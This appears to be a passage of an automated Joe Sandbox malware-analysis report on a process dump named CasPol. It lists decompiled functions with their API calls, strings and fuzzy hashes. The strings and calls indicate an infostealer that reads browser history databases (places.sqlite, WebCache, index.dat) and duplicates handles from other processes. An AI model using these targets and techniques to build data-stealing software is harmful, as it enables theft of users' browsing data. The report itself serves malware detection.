                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                                                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                    • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                    Function 00405220 Relevance: 4.6, APIs: 3, Instructions: 88libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                                      • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 966727022-0
                                                                                                                                                                                    • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                    • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1979745280-0
                                                                                                                                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                    • API String ID: 2641622041-467022611
                                                                                                                                                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                    Memory Dump Source
